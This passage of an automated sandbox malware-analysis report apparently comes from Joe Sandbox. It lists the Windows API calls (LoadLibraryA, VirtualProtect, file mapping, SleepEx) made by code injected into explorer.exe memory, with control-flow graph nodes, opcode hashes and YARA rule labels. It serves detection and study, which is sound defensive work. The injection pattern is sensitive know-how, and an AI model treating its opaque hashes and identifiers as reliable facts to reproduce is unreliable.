                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 004DB5A7
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 004DB651
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 004DB66F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004DA000.00000040.80000000.00040000.00000000.sdmp, Offset: 004DA000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4da000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 895956442-0
                                                                                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                        • Instruction ID: 6b80e6b9117ae0590efc540d252bf551b375ef9b78dc10799397c1d28dfcdd95
                                                                                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                                        • Instruction Fuzzy Hash: BC518B3175491D9BCB24AA38ACF42F5B3C1F759329B59062BC48AC3385D75CC84683CA
                                                                                                                                        Function 004D34C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004D1BF8: OpenFileMappingA.KERNEL32 ref: 004D1C0F
                                                                                                                                          • Part of subcall function 004D1BF8: MapViewOfFile.KERNELBASE ref: 004D1C2E
                                                                                                                                        • SysFreeMap.PGOCR ref: 004D36F7
                                                                                                                                        • SleepEx.KERNELBASE ref: 004D3701
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4205437007-0
                                                                                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                        • Instruction ID: 67ded6d96049de90f6bd53c231d07bb9e1c6fccd3ceb4b1aebfdcf845d3e7427
                                                                                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                                        • Instruction Fuzzy Hash: 22519430218A085FDB19FF29D8A96AA7391EB94315F44461FE447C73A1DF3CDA058786
                                                                                                                                        Function 004D1BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 113 4d1bf8-4d1c18 OpenFileMappingA 114 4d1c3b-4d1c48 113->114 115 4d1c1a-4d1c38 MapViewOfFile 113->115 115->114
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000015.00000002.4123104713.00000000004D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 004D1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_21_2_4d1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$MappingOpenView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3439327939-0
                                                                                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                        • Instruction ID: 6c7a65d5fc388cc0b49a965f6208c27d4291a2d5e978670403597d7e701fb9f5
                                                                                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                                        • Instruction Fuzzy Hash: 2CF08234318F0D4FAB44EF7C9C9C136B7E0EBA8202700857A984AC6264EF34C8408701